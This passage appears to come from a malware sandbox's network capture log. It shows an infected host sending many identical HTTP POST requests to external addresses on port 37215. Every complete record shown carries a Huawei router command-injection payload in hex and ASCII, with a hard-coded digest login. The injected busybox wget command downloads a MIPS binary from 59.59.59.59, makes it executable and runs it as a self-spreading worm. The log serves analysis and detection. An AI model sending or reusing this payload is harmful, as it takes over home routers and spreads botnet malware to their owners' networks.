2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          727192.168.2.1543152157.190.160.25437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.645771980 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          728192.168.2.1539618221.145.144.15337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.646331072 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          729192.168.2.1539756101.199.177.13137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.646358967 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          730192.168.2.153332841.116.140.13437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.646398067 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          731192.168.2.155523087.181.199.12237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.646544933 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          732192.168.2.1544034197.199.186.13837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.649139881 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          733192.168.2.153680041.129.66.2837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.649710894 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          734192.168.2.1549694157.215.225.24937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.649764061 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          735192.168.2.1555840197.252.225.6337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.649784088 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          736192.168.2.1539486137.97.253.17837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.649847031 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          737192.168.2.1549100132.23.184.9237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.650396109 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
